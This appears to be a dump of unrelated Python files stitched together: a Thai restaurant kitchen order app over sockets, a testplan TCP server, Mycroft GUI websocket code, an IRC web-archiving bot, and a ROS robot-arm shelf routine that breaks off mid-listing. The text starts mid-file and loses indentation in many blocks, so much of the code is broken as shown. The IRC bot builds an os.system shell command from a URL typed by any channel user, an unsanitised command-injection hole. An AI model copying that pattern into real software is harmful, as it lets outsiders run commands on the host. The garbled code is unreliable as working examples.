print('IP/PORT: (waiting)',waitingip,waitingport)
##############NETWORK CONFIG###############
from tkinter import *
from tkinter import ttk
from tkinter import messagebox
import socket
import threading
foodlist = {'1001':{'fid':'1001','name':'ไก่ไม่มีกระดูก','price':20},
'1002':{'fid':'1002','name':'ปลาแซลมอนย่างซีอิ้ว','price':50},
'1003':{'fid':'1003','name':'ไก่เผ็ด','price':45},
'1004':{'fid':'1004','name':'ข้าวยำไก่แซ็ป','price':60},
'1005':{'fid':'1005','name':'มันบด','price':15},
'1006':{'fid':'1006','name':'ปลากระพงทอด','price':70},
'1007':{'fid':'1007','name':'ข้าวเปล่า','price':10},
'1008':{'fid':'1008','name':'น้ำดื่ม','price':7},
'1009':{'fid':'1009','name':'น้ำส้ม','price':15},
'1010':{'fid':'1010','name':'น้ำอัดลม','price':25},
}
GUI = Tk()
GUI.geometry('1000x700')
GUI.title('Kitchen : โปรแกรมในครัว')
FONT = ('Angsana New',15)
def SettingIP(event=None):
GUI2 = Toplevel()
GUI2.geometry('500x500')
GUI2.title('กรุณาตั้งค่า ip ก่อนใช้งาน')
readip = Read()
ip_kitchen = readip[0]
ip_waiting = readip[1]
########################
L1 = ttk.Label(GUI2,text='Kitchen IP').pack(pady=10)
v_kitchenip = StringVar()
v_kitchenip.set(ip_kitchen[1])
E1 = ttk.Entry(GUI2,textvariable=v_kitchenip,font=FONT)
E1.pack(pady=10)
L2 = ttk.Label(GUI2,text='Kitchen Port').pack(pady=10)
v_kitchenport = StringVar()
v_kitchenport.set(ip_kitchen[2])
E2 = ttk.Entry(GUI2,textvariable=v_kitchenport,font=FONT)
E2.pack(pady=10)
########################
L3 = ttk.Label(GUI2,text='Waiting IP').pack(pady=10)
v_waitingip = StringVar()
v_waitingip.set(ip_waiting[1])
E3 = ttk.Entry(GUI2,textvariable=v_waitingip,font=FONT)
E3.pack(pady=10)
L4 = ttk.Label(GUI2,text='Waiting Port').pack(pady=10)
v_waitingport = StringVar()
v_waitingport.set(ip_waiting[2])
E4 = ttk.Entry(GUI2,textvariable=v_waitingport,font=FONT)
E4.pack(pady=10)
########################
def SaveSetting():
saveip = [['kitchen',v_kitchenip.get(),v_kitchenport.get()],
['waiting',v_waitingip.get(),v_waitingport.get()]]
Save(saveip)
messagebox.showinfo('บันทึก ip ใหม่','บันทึก ip ใหม่แล้ว!')
GUI2.withdraw()
B1 = ttk.Button(GUI2,text='Save',command=SaveSetting)
B1.pack(ipady=10,ipadx=20)
GUI2.mainloop()
GUI.bind('<F10>',SettingIP)
F1 = Frame(GUI)
F2 = Frame(GUI)
F3 = Frame(GUI)
F1.place(x=20,y=120)
F2.place(x=220,y=120)
F3.place(x=680,y=120)
################Zone1################
L11 = ttk.Label(F1,text='รายการคิว',font=FONT,foreground='green').pack()
header = ['Food Order No.','Quantity']
hw = [100,70]
table_order = ttk.Treeview(F1,height=25,column=header,show='headings')
table_order.pack()
for hd,w in zip(header,hw):
table_order.heading(hd,text=hd)
table_order.column(hd,width=w)
################Zone2################
L21 = ttk.Label(F2,text='รายการอาหาร',font=FONT,foreground='green').pack()
header = ['ID','Food Name','Price','Quantity','Total']
hw = [70,150,70,70,70] # | ID | Foodname | Price |xxxx
table_food = ttk.Treeview(F2,height=25,column=header,show='headings')
table_food.pack()
for hd,w in zip(header,hw):
table_food.heading(hd,text=hd)
table_food.column(hd,width=w)
################Zone3################
L31 = ttk.Label(F3,text='รายการคิวที่เสร็จแล้ว',font=FONT,foreground='green').pack()
header = ['Food Order No.','Quantity']
hw = [100,70]
table_finish = ttk.Treeview(F3,height=25,column=header,show='headings')
table_finish.pack()
for hd,w in zip(header,hw):
table_finish.heading(hd,text=hd)
table_finish.column(hd,width=w)
##########Button############
################Zone4################
FB = Frame(GUI)
FB.place(x=50,y=50)
B1 = ttk.Button(FB,text='อาหารเสร็จแล้ว')
B1.grid(row=0,column=0,ipadx=20,ipady=10,padx=10)
B2 = ttk.Button(FB,text='เคลียร์')
B2.grid(row=0,column=1,ipadx=20,ipady=10,padx=10)
###############SERVER##################
def ConverttoTable(data):
    # data = 'k|Q1001|1001=3,1002=2,1003=2' (message type | order no. | fid=quantity,...)
    # convert to rows of ['ID','Food Name','Price','Quantity','Total']
data = data.split('|')[2]
#print('Data:',data)
food = data.split(',')
#print('Food:',food)
allfood = []
for f in food:
fs = f.split('=')
fid = fs[0]
quan = fs[1]
dt = [fid,
foodlist[fid]['name'],
foodlist[fid]['price'],
quan,
int(foodlist[fid]['price']) * int(quan)]
allfood.append(dt)
print(allfood)
return allfood
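# Example (hypothetical order): ConverttoTable('k|Q1|1001=2,1008=1') returns
#   [['1001', 'ไก่ไม่มีกระดูก', 20, '2', 40], ['1008', 'น้ำดื่ม', 7, '1', 7]]
# using the prices defined in foodlist above.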
global food_cooking
food_cooking = {}
global chef_cooking
chef_cooking = []
#chef_cooking = [1001,1002,1003]
def RunServer():
    global chef_cooking
    my_ip = kitchenip #'192.168.1.30'
    port = kitchenport #7000
    # Create, bind and listen on the server socket once, outside the accept loop
    server = socket.socket()
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
    server.bind((my_ip,port))
    server.listen(1)
    while True:
        print('Waiting for client...')
        client, addr = server.accept()
print('Connected from: ',str(addr))
        data = client.recv(1024).decode('utf-8') # e.g. 'k|Q1001|1001=3,1002=1'
#print(type(data))
if data[0] == 'k':
#table_order.insert('','end',value=[data[2:]])
ordernum = data.split('|')[1]
food_cooking[ordernum] = ConverttoTable(data) #add result to dictionary
if len(chef_cooking) == 0:
                # if the chef has no order in progress yet
ThreadSendtoWaiting('wl-'+ordernum)
v_current.set('#' + ordernum)
sumquan = []
for fc in food_cooking[ordernum]:
table_food.insert('','end',value=fc)
print('FC: ',fc)
sumquan.append(int(fc[3]))
print('ORDER NO.',ordernum,type(ordernum))
table_order.insert('','end',value=[ordernum,sum(sumquan)])
chef_cooking.append([ordernum,sum(sumquan)])
else:
sumquan = []
for fc in food_cooking[ordernum]:
print('FC: ',fc)
sumquan.append(int(fc[3]))
chef_cooking.append([ordernum,sum(sumquan)])
ThreadSendtoWaiting('wl-'+ordernum)
table_order.insert('','end',value=[ordernum,sum(sumquan)])
else:
print('<<<< message is not for kitchen >>>>')
print('Message from client: ',data)
client.send('We received your Message.'.encode('utf-8'))
client.close()
print('ALL FOOD COOKING: ',food_cooking)
# chef_cooking tracks what the chef is currently working on
# food_cooking tracks the food items for each order
def Finish(event=None):
print('CHEF:',chef_cooking)
if len(chef_cooking) != 0:
del food_cooking[chef_cooking[0][0]] #[1001,3]
table_finish.insert('',0,value=chef_cooking[0]) # chef_cooking[0] = ['1001',3]
ThreadSendtoWaiting('fl-'+chef_cooking[0][0])
del chef_cooking[0]
table_food.delete(*table_food.get_children())
table_order.delete(*table_order.get_children())
for c in chef_cooking:
table_order.insert('','end',value=c)
#insert current food
if len(chef_cooking) > 0:
ordernum = chef_cooking[0][0]
v_current.set('#' + ordernum)
for fc in food_cooking[ordernum]:
table_food.insert('','end',value=fc)
if len(chef_cooking) == 0:
v_current.set('----ORDER NO.----')
else:
v_current.set('----ORDER NO.----')
GUI.bind('<F1>',Finish)
v_current = StringVar()
v_current.set('----ORDER NO.----')
currentorder = ttk.Label(GUI,textvariable=v_current)
currentorder.configure(font=(None,30,'bold'))
currentorder.configure(foreground='green')
currentorder.place(x=400,y=50)
def ShowFood(event=None):
    select = table_order.selection() # check which row was double-clicked
    data = table_order.item(select) # fetch that row's data
v_current.set('#' + data['values'][0])
print('DATA:',data)
table_food.delete(*table_food.get_children())
for fc in food_cooking[data['values'][0]]:
table_food.insert('','end',value=fc)
def DeleteFood(event=None):
print('TEST DELETE')
    select = table_order.selection() # check which row is selected
    data = table_order.item(select) # fetch that row's data
print('DATA:',data)
for i,f in enumerate(chef_cooking):
#f = ['1001',3]
if f[0] == data['values'][0]:
del chef_cooking[i]
table_order.delete(*table_order.get_children())
ThreadSendtoWaiting('dl-' + data['values'][0])
try:
for c in chef_cooking:
table_order.insert('','end',value=c)
v_current.set('#' + chef_cooking[0][0])
table_food.delete(*table_food.get_children())
for fc in food_cooking[chef_cooking[0][0]]:
table_food.insert('','end',value=fc)
except:
v_current.set('----ORDER NO.----')
table_food.delete(*table_food.get_children())
table_order.bind('<Double-1>',ShowFood)
table_order.bind('<Delete>',DeleteFood)
def SendtoWaiting(data):
serverip = waitingip #'192.168.1.30'
port = waitingport #7500
server = socket.socket()
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
server.connect((serverip,port))
server.send(data.encode('utf-8'))
data_server = server.recv(1024).decode('utf-8')
print('Data from Server: ', data_server)
server.close()
def ThreadSendtoWaiting(data):
task = threading.Thread(target=SendtoWaiting,args=(data,))
task.start()
def ThreadRunServer():
task = threading.Thread(target=RunServer)
task.start()
ThreadRunServer()
GUI.mainloop()
|
server.py
|
"""TCP Server module."""
import time
import socket
import select
import threading
from testplan.common.utils.timing import wait
class Server(object):
"""
A server that can send and receive messages over the session protocol.
Supports multiple connections.
:param host: The host address the server is bound to.
:type host: ``str``
:param port: The port the server is bound to.
:type port: ``str`` or ``int``
:param listen: Socket listen argument.
:type listen: ``int``
"""
def __init__(self, host="localhost", port=0, listen=1):
self._input_host = host
self._input_port = port
self._listen = listen
self._ip = None
self._port = None
self._listening = False
self._server = None
self._server_thread = None
self._lock = threading.Lock()
self._connection_by_fd = {}
self._fds = {}
self.active_connections = 0
self.accepted_connections = 0
@property
def host(self):
"""Input host provided."""
return self._input_host
@property
def ip(self):
"""IP retrieved from socket."""
return self._ip
@property
def port(self):
"""Port retrieved after binding."""
return self._port
@property
def socket(self):
"""
Returns the underlying ``socket`` object
"""
return self._server
def bind(self):
"""Bind to a socket."""
self._server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if self._input_port != 0:
self._server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._server.bind((self._input_host, self._input_port))
self._ip, self._port = self._server.getsockname()
def serve(self, loop_sleep=0.005, listening_timeout=5):
"""Start serving connections."""
self._server_thread = threading.Thread(
target=self._serving, kwargs=dict(loop_sleep=loop_sleep)
)
self._server_thread.daemon = True
self._server_thread.start()
wait(lambda: self._listening, listening_timeout, raise_on_timeout=True)
def _serving(self, loop_sleep=0.005):
"""Listen for new inbound connections."""
self._server.listen(self._listen)
self._listening = True
inputs = [self._server]
outputs = []
while self._listening:
readable, writable, exceptional = select.select(
inputs, outputs, inputs
)
for sock in readable:
if sock is self._server:
# New connection
conn, client_addr = sock.accept()
inputs.append(conn)
self._connection_by_fd[conn.fileno()] = conn
self._fds[self.active_connections] = conn.fileno()
self.active_connections += 1
for sock in exceptional:
inputs.remove(sock)
sock.close()
time.sleep(loop_sleep)
self._remove_all_connections()
try:
self._server.shutdown(socket.SHUT_RDWR)
except:
pass
self._server.close()
def accept_connection(self, timeout=10, accept_connection_sleep=0.1):
"""
Accepts a connection in the order in which they were received.
Return the index of the connection, which can be used to send
and receive messages using that connection.
If no connection is already available or becomes available in the given
timeout, then the method returns -1.
:param timeout: Timeout to wait for receiving connection.
:type timeout: ``int``
:param accept_connection_sleep: Sleep time to retry accept connection.
:type accept_connection_sleep: ``float``
:return: Index of connection
:rtype: ``int``
"""
started = time.time()
while True:
if self.accepted_connections in self._fds:
self.accepted_connections += 1
return self.accepted_connections - 1
if time.time() > started + timeout:
return -1
time.sleep(accept_connection_sleep)
def receive(
self, size=1024, conn_idx=None, timeout=30, wait_full_size=True
):
"""
Receive a message of given size (number of bytes) from the given
connection.
:param size: Number of bytes to receive
:type size: ``int``
:param conn_idx: Index of connection to receive from
:type conn_idx: ``int``
:param timeout: timeout in seconds
:type timeout: ``int``
:param wait_full_size: Wait until full size is received.
:type wait_full_size: ``bool``
:return: message received
:rtype: ``bytes``
"""
conn_idx = self._validate_connection_idx(conn_idx)
# Get file descriptor and details of connection
fdesc = self._fds[conn_idx]
connection = self._connection_by_fd[fdesc]
        connection.settimeout(timeout)
        if wait_full_size is False:
msg = connection.recv(size)
connection.settimeout(0)
else:
with self._lock:
msg = b""
try:
while len(msg) < size:
new_msg = connection.recv(size - len(msg))
if not new_msg:
raise Exception("Socket connection broken")
msg += new_msg
except socket.error:
if timeout == 0:
raise socket.timeout()
raise
return msg
def send(self, msg, conn_idx=None, timeout=30):
"""
Send the given message through the given connection.
:param msg: message to be sent
:type msg: ``bytes``
:param conn_idx: Index of connection to send to
:type conn_idx: ``int``
:param timeout: Timeout in seconds for sending all bytes
:type timeout: ``int``
:return: Number of bytes sent
:rtype: ``int``
"""
conn_idx = self._validate_connection_idx(conn_idx)
connection = self._connection_by_fd[self._fds[conn_idx]]
connection.settimeout(timeout)
with self._lock:
connection.sendall(msg)
return len(msg)
def close(self):
"""Closes the server and listen thread."""
self._listening = False
# self._serving may be stuck in select.select
if self._server_thread:
self._server_thread.join(timeout=0.1)
def _validate_connection_idx(self, conn_idx):
"""
Check if given connection index is valid.
If this is None, then the connection defaults to the one and only
existing active connection. If there are more active connections or the
initial connection is no longer valid this will fail.
:param conn_idx: Index of connection to send to
:type conn_idx: ``int``
:return: Connection index to send message to
:rtype: ``int``
"""
if conn_idx is None:
if self.accepted_connections > 1:
conn_idx = self.accepted_connections - 1
else:
conn_idx = 0
if self.accepted_connections == 0:
raise Exception("No connection accepted")
if conn_idx not in self._fds:
raise Exception("Connection {} not active".format(conn_idx))
return conn_idx
def _remove_all_connections(self):
"""
Unregister, close and remove all existing connections
:return: ``None``
:rtype: ``NoneType``
"""
for fdesc in self._connection_by_fd:
self._connection_by_fd[fdesc].close()
self._connection_by_fd = {}
self._fds = {}
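# A minimal usage sketch (hypothetical exchange, assuming a client connects to
# (server.ip, server.port) after serve() is called):
#
#   server = Server(host="localhost", port=0)
#   server.bind()
#   server.serve()                                  # background accept loop
#   idx = server.accept_connection(timeout=10)      # -1 if nothing connected
#   if idx >= 0:
#       msg = server.receive(size=5, conn_idx=idx)  # blocks until 5 bytes arrive
#       server.send(b"reply", conn_idx=idx)
#   server.close()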
|
gui_server.py
|
# Copyright 2018 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from os import getpid
from os.path import basename
import json
import websocket
from threading import Thread, Lock
from mycroft.messagebus.client.ws import WebsocketClient
from mycroft.messagebus.message import Message
bus = None
buffer = None # content will show on the CLI "GUI" representation
msgs = []
loaded = []
skill = None
page = None
vars = {}
def start_qml_gui(messagebus, output_buf):
global bus
global buffer
bus = messagebus
buffer = output_buf
# Initiate the QML GUI
log_message("Announcing CLI GUI")
bus.on('mycroft.gui.port', handle_gui_ready)
bus.emit(Message("mycroft.gui.connected",
{"gui_id": "cli_" + str(getpid())}))
log_message("Announced CLI GUI")
def log_message(msg):
global msgs
msgs.append(msg)
if len(msgs) > 20:
del msgs[0]
build_output_buffer()
def build_output_buffer():
global buffer
buffer.clear()
try:
if skill:
buffer.append("Active Skill: {}".format(skill))
buffer.append("Page: {}".format(basename(page)))
buffer.append("vars: ")
for v in vars[skill]:
buffer.append(" {}: {}".format(v, vars[skill][v]))
except Exception as e:
buffer.append(repr(e))
buffer.append("-----------------")
buffer.append("MESSAGES")
buffer.append("-----------------")
for m in msgs:
if len(buffer) > 20: # cap out at 20 lines total
return
buffer.append(m)
def handle_gui_ready(msg):
# Attempt to connect to the port
gui_id = msg.data.get("gui_id")
    if gui_id != "cli_" + str(getpid()):
# Not us, ignore!
return
# Create the websocket for GUI communications
port = msg.data.get("port")
if port:
log_message("Connecting CLI GUI on "+str(port))
ws = websocket.WebSocketApp("ws://0.0.0.0:" + str(port) + "/gui",
on_message=on_gui_message,
on_error=on_gui_error,
on_close=on_gui_close)
log_message("WS = "+str(ws))
event_thread = Thread(target=gui_connect, args=[ws])
        event_thread.daemon = True
event_thread.start()
def gui_connect(ws):
# Once the websocket has connected, just watch it for speak events
log_message("GUI Connected"+str(ws))
ws.on_open = on_gui_open
ws.run_forever()
def on_gui_open(ws):
log_message("GUI Opened")
def on_gui_message(ws, payload):
global loaded
global skill
global page
global vars
try:
msg = json.loads(payload)
log_message("Msg: "+str(payload))
type = msg.get("type")
if type == "mycroft.session.set":
skill = msg.get("namespace")
data = msg.get("data")
if skill not in vars:
vars[skill] = {}
for d in data:
vars[skill][d] = data[d]
elif type == "mycroft.session.list.insert":
# Insert new namespace
skill = msg.get('data')[0]['skill_id']
loaded.insert(0, [skill, []])
elif type == "mycroft.gui.list.insert":
# Insert a page in an existing namespace
page = msg['data'][0]['url']
pos = msg.get('position')
loaded[0][1].insert(pos, page)
skill = loaded[0][0]
elif type == "mycroft.session.list.move":
# Move the namespace at "pos" to the top of the stack
pos = msg.get('from')
loaded.insert(0, loaded.pop(pos))
elif type == "mycroft.events.triggered":
# Switch selected page of namespace
skill = msg['namespace']
pos = msg['data']['number']
for n in loaded:
if n[0] == skill:
page = n[1][pos]
build_output_buffer()
except Exception as e:
log_message(repr(e))
log_message("Invalid JSON: "+str(payload))
def on_gui_close(ws):
log_message("GUI closed")
def on_gui_error(ws, err):
log_message("GUI error: "+str(err))
|
main.py
|
import re
import socket
import threading
import os
import binascii
irc_server = 'irc.uworld.se'
irc_port = 6667
irc_channel = '#bibanon-ab'
irc_nick = 'archivebot'
irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
irc.connect((irc_server, irc_port))
exception_file = 'exceptions'
irc_log_file = 'irclog'
def irc_bot_listener():
while True:
        irc_message = irc.recv(2048).decode('utf-8', errors='replace')
with open(irc_log_file, 'a') as file:
file.write(irc_message)
if 'PING :' in irc_message:
message = re.search(r'^[^:]+:(.*)$', irc_message).group(1)
            irc.send(('PONG :' + message + '\n').encode('utf-8'))
elif re.search(r'^:.+PRIVMSG[^:]+:!.*', irc_message):
command = re.search(r'^:.+PRIVMSG[^:]+:(!.*)', irc_message).group(1).replace('\r', '').replace('\n', '').split(' ')
user = re.search(r'^:([^!]+)!', irc_message).group(1)
if command[0] in ('!a', '!archive', '!ao', '!archive-only', '!abort'):
command_archive(command, user)
def irc_bot_print(channel, message):
    try:
        irc.send(("PRIVMSG " + channel + " :" + message + "\n").encode('utf-8'))
    except Exception as exception:
        with open(exception_file, 'a') as exceptions:
            exceptions.write(str(exception) + '\n\n')
        irc.send(('JOIN ' + irc_channel + '\n').encode('utf-8')) # rejoin after a send failure
print("IRC BOT: " + message)
def command_archive(message, user):
if len(message) == 1:
irc_bot_print(irc_channel, user + ': What do you want to do?')
elif message[1].startswith('http://') or message[1].startswith('https://'):
if message[0] in ('!a', '!archive'):
threading.Thread(target = archive, args = (message, user, 'Site')).start()
elif message[0] in ('!ao', '!archive-only'):
threading.Thread(target = archive, args = (message+['--1'], user, 'Webpage')).start()
elif message[0] == '!abort':
if not message[1]:
irc_bot_print(irc_channel, user + ': Please specify a job.')
else:
for item in os.listdir('./'):
if item.endswith(message[1][:8]):
stopfile = './' + item + '/stop'
open(stopfile, 'w').close()
break
else:
irc_bot_print(irc_channel, user + ': No job was found running with ID ' + message[1] + '.')
else:
irc_bot_print(irc_channel, user + ': I can only handle http:// and https://.')
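# Hypothetical channel messages the bot reacts to (per the parsing above):
#   !archive https://example.com --concurrency=2 --delay=500-900
#   !ao https://example.com/page.html
#   !abort 1a2b3c4d      (first 8 characters of a job ID)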
def dashboard():
os.system('~/.local/bin/gs-server')
def archive(message, user, kind):
    job_id = binascii.hexlify(os.urandom(20)).decode('ascii')
concurrency = '3'
delay = '350-750'
optioncommands = ('--con', '--concurrency', '--delay')
commandslist = ('--igsets', '--no-offsite-links', '--igon', '--no-video', '--no-sitemaps', '--no-dupespotter', '--concurrency', '--delay', '--1')
for command in message[2:]:
if '=' in command:
if command.startswith('--concurrency') or command.startswith('--con'):
concurrency = command.split('=')[1]
elif command.startswith('--delay'):
delay = command.split('=')[1]
if not command.split('=')[0] in commandslist+optioncommands:
irc_bot_print(irc_channel, user + ': ' + command + ' is not supported.')
break
else:
irc_bot_print(irc_channel, user + ': ' + kind + ' ' + message[1] + ' is being archived with ID ' + job_id + '.')
finish = os.system('~/.local/bin/grab-site ' + message[1] + ' --id=' + job_id + ' --concurrency=' + concurrency + ' --delay=' + delay + ' ' + ' '.join([command for command in message[2:] if command in commandslist]) + ' --warc-max-size=524288000')
print(finish)
if finish == 0:
irc_bot_print(irc_channel, user + ': ' + kind + ' ' + message[1] + ' with ID ' + job_id + ' is archived.')
elif finish == 256:
irc_bot_print(irc_channel, user + ': ' + kind + ' ' + message[1] + ' with ID ' + job_id + ' was aborted.')
else:
irc_bot_print(irc_channel, user + ': ' + kind + ' ' + message[1] + ' with ID ' + job_id + ' is not archived correctly.')
def irc_bot_join():
    irc.send(('USER ' + irc_nick + ' ' + irc_nick + ' ' + irc_nick + ' :This is the bot for ' + irc_channel + '.\n').encode('utf-8'))
    irc.send(('NICK ' + irc_nick + '\n').encode('utf-8'))
    irc.send(('JOIN ' + irc_channel + '\n').encode('utf-8'))
def main():
    irc_bot_join()
    threading.Thread(target = irc_bot_listener).start()
    threading.Thread(target = dashboard).start()
if __name__ == '__main__':
main()
|
out.py
|
#!/usr/bin/python3
# coding=utf8
# Date:2021/04/20
# Author:Aiden
import sys
import cv2
import math
import rospy
import threading
import numpy as np
from threading import Timer
from std_msgs.msg import *
from std_srvs.srv import *
from sensor_msgs.msg import Image
from warehouse.srv import *
from warehouse.msg import Grasp
from hiwonder_servo_msgs.msg import MultiRawIdPosDur
from kinematics import ik_transform
from armpi_fpv import bus_servo_control
# "Out" routine: move items out of the warehouse (off the shelf)
# Unless stated otherwise, lengths and distances are in meters (m)
# Initialization
__target_data = ()
__isRunning = False
org_image_sub_ed = False
lock = threading.RLock()
ik = ik_transform.ArmIK()
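# Servo roles, as inferred from usage below: servo 1 drives the gripper
# (the grasp_posture values), servos 3-5 are the arm joints, and servo 6
# pans the base toward the target (the IK solver returns it per waypoint).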
# Initial position
def initMove():
with lock:
bus_servo_control.set_servos(joints_pub, 1500, ((1, 75), (2, 500), (3, 80), (4, 825), (5, 625), (6, 500)))
rospy.sleep(2)
# Reset variables
def reset():
global __target_data
__target_data = ()
# Called when the app initializes this mode
def init():
rospy.loginfo("out Init")
initMove()
reset()
def pick(grasps):
position = grasps.grasp_pos.position
rotation = grasps.grasp_pos.rotation
approach = grasps.grasp_approach
retreat = grasps.grasp_retreat
    # Check that every waypoint is reachable; if any is not, return False
target1 = ik.setPitchRanges((position.x + approach.x, position.y + approach.y, position.z + approach.z), rotation.r, -180, 0)
target2 = ik.setPitchRanges((position.x, position.y, position.z), rotation.r, -180, 0)
target3 = ik.setPitchRanges((position.x, position.y, position.z + grasps.up), rotation.r, -180, 0)
target4 = ik.setPitchRanges((position.x + retreat.x, position.y + retreat.y, position.z + retreat.z), rotation.r, -180, 0)
if not __isRunning:
return False
if target1 and target2 and target3 and target4:
        # Step 1: turn the base toward the target and open the gripper
servo_data = target1[1]
bus_servo_control.set_servos(joints_pub, 800, ((1, grasps.pre_grasp_posture), (2, 500), (3, 80), (4, 825), (5, 625), (6, servo_data['servo6'])))
rospy.sleep(0.8)
if not __isRunning:
return False
        # Step 2: move to the approach point
bus_servo_control.set_servos(joints_pub, 500, ((3, servo_data['servo3']), (4, servo_data['servo4']), (5, servo_data['servo5']), (6, servo_data['servo6'])))
rospy.sleep(0.5)
if not __isRunning:
return False
        # Step 3: move to the target point
servo_data = target2[1]
bus_servo_control.set_servos(joints_pub, 500, ((3, servo_data['servo3']), (4, servo_data['servo4']), (5, servo_data['servo5']), (6, servo_data['servo6'])))
rospy.sleep(1)
if not __isRunning:
servo_data = target4[1]
bus_servo_control.set_servos(joints_pub, 1000, ((1, 200), (3, servo_data['servo3']), (4, servo_data['servo4']), (5, servo_data['servo5']), (6, servo_data['servo6'])))
rospy.sleep(1)
return False
        # Step 4: close the gripper to grasp
bus_servo_control.set_servos(joints_pub, 500, ((1, grasps.grasp_posture), ))
rospy.sleep(1)
if not __isRunning:
bus_servo_control.set_servos(joints_pub, 500, ((1, grasps.pre_grasp_posture), ))
rospy.sleep(0.5)
servo_data = target4[1]
bus_servo_control.set_servos(joints_pub, 1000, ((1, 200), (3, servo_data['servo3']), (4, servo_data['servo4']), (5, servo_data['servo5']), (6, servo_data['servo6'])))
rospy.sleep(1)
return False
        # Step 5: lift
servo_data = target3[1]
if servo_data != target2[1]:
bus_servo_control.set_servos(joints_pub, 400, ((3, servo_data['servo3']), (4, servo_data['servo4']), (5, servo_data['servo5']), (6, servo_data['servo6'])))
rospy.sleep(0.5)
if not __isRunning:
bus_servo_control.set_servos(joints_pub, 500, ((1, grasps.pre_grasp_posture), ))
rospy.sleep(0.5)
servo_data = target4[1]
bus_servo_control.set_servos(joints_pub, 1000, ((1, 200), (3, servo_data['servo3']), (4, servo_data['servo4']), (5, servo_data['servo5']), (6, servo_data['servo6'])))
rospy.sleep(1)
return False
        # Step 6: move to the retreat point
servo_data = target4[1]
if servo_data != target3[1]:
bus_servo_control.set_servos(joints_pub, 500, ((3, servo_data['servo3']), (4, servo_data['servo4']), (5, servo_data['servo5']), (6, servo_data['servo6'])))
rospy.sleep(0.5)
if not __isRunning:
bus_servo_control.set_servos(joints_pub, 500, ((1, grasps.pre_grasp_posture), ))
rospy.sleep(0.5)
return False
        # Step 7: return to the rest position
servo_data = target1[1]
bus_servo_control.set_servos(joints_pub, 500, ((2, 500), (3, 80), (4, 825), (5, 625), (6, servo_data['servo6'])))
rospy.sleep(0.5)
if not __isRunning:
bus_servo_control.set_servos(joints_pub, 500, ((1, grasps.pre_grasp_posture), ))
rospy.sleep(0.5)
return False
return target2[2]
else:
rospy.loginfo('pick failed')
return False
def place(places):
position = places.grasp_pos.position
rotation = places.grasp_pos.rotation
approach = places.grasp_approach
retreat = places.grasp_retreat
    # Check that every waypoint is reachable; if any is not, return False
target1 = ik.setPitchRanges((position.x + approach.x, position.y + approach.y, position.z + approach.z), rotation.r, -180, 0)
target2 = ik.setPitchRanges((position.x, position.y, position.z), rotation.r, -180, 0)
target3 = ik.setPitchRanges((position.x, position.y, position.z + places.up), rotation.r, -180, 0)
target4 = ik.setPitchRanges((position.x + retreat.x, position.y + retreat.y, position.z + retreat.z), rotation.r, -180, 0)
if not __isRunning:
return False
if target1 and target2 and target3 and target4:
        # Step 1: turn the base toward the target
        servo_data = target1[1]
        bus_servo_control.set_servos(joints_pub, 800, ((1, places.pre_grasp_posture), (2, 500), (3, 80), (4, 825), (5, 625), (6, servo_data['servo6'])))
rospy.sleep(0.8)
if not __isRunning:
bus_servo_control.set_servos(joints_pub, 500, ((1, places.grasp_posture), ))
rospy.sleep(0.5)
return False
        # Step 2: move to the approach point
bus_servo_control.set_servos(joints_pub, 1000, ((3, servo_data['servo3']), (4, servo_data['servo4']), (5, servo_data['servo5']), (6, servo_data['servo6'])))
rospy.sleep(1)
if not __isRunning:
bus_servo_control.set_servos(joints_pub, 500, ((1, places.grasp_posture), ))
rospy.sleep(0.5)
return False
        # Step 3: move to the target point
servo_data = target2[1]
if servo_data != target1[1]:
bus_servo_control.set_servos(joints_pub, 1000, ((3, servo_data['servo3']), (4, servo_data['servo4']), (5, servo_data['servo5']), (6, servo_data['servo6'])))
rospy.sleep(1.5)
if not __isRunning:
bus_servo_control.set_servos(joints_pub, 500, ((1, places.grasp_posture), ))
rospy.sleep(0.5)
servo_data = target4[1]
bus_servo_control.set_servos(joints_pub, 1000, ((1, 200), (3, servo_data['servo3']), (4, servo_data['servo4']), (5, servo_data['servo5']), (6, servo_data['servo6'])))
rospy.sleep(1)
return False
        # Step 4: open the gripper to place the item
bus_servo_control.set_servos(joints_pub, 800, ((1, places.grasp_posture), ))
rospy.sleep(1)
if not __isRunning:
servo_data = target4[1]
bus_servo_control.set_servos(joints_pub, 1000, ((1, 200), (3, servo_data['servo3']), (4, servo_data['servo4']), (5, servo_data['servo5']), (6, servo_data['servo6'])))
rospy.sleep(1)
return False
        # Step 5: lift
servo_data = target3[1]
if servo_data != target2[1]:
bus_servo_control.set_servos(joints_pub, 800, ((3, servo_data['servo3']), (4, servo_data['servo4']), (5, servo_data['servo5']), (6, servo_data['servo6'])))
rospy.sleep(0.8)
if not __isRunning:
servo_data = target4[1]
bus_servo_control.set_servos(joints_pub, 1000, ((1, 200), (3, servo_data['servo3']), (4, servo_data['servo4']), (5, servo_data['servo5']), (6, servo_data['servo6'])))
rospy.sleep(1)
return False
        # Step 6: move to the retreat point
servo_data = target4[1]
if servo_data != target3[1]:
bus_servo_control.set_servos(joints_pub, 500, ((3, servo_data['servo3']), (4, servo_data['servo4']), (5, servo_data['servo5']), (6, servo_data['servo6'])))
rospy.sleep(0.5)
if not __isRunning:
return False
        # Step 7: return to the rest position
servo_data = target1[1]
bus_servo_control.set_servos(joints_pub, 1000, ((2, 500), (3, 80), (4, 825), (5, 625), (6, servo_data['servo6'])))
rospy.sleep(1)
if not __isRunning:
return False
return True
else:
rospy.loginfo('place failed')
return False
#############################################
# Position (x, y, z, in m) of each shelf level
shelf_position = {'R1':[0.277, 0, 0.02],
'R2':[0.277, 0, 0.12],
'R3':[0.277, 0, 0.21],
'L1':[-0.277, 0, 0.02],
'L2':[-0.277, 0, 0.12],
'L3':[-0.277, 0, 0.21]}
# Drop-off position (x, y, z, in m) for each shelf level
place_position = {'R1':[0.06, 0.15, 0.01],
'R2':[-0.06, 0.15, 0.01],
'R3':[0, 0.15, 0.01],
'L1':[0.06, 0.22, 0.015],
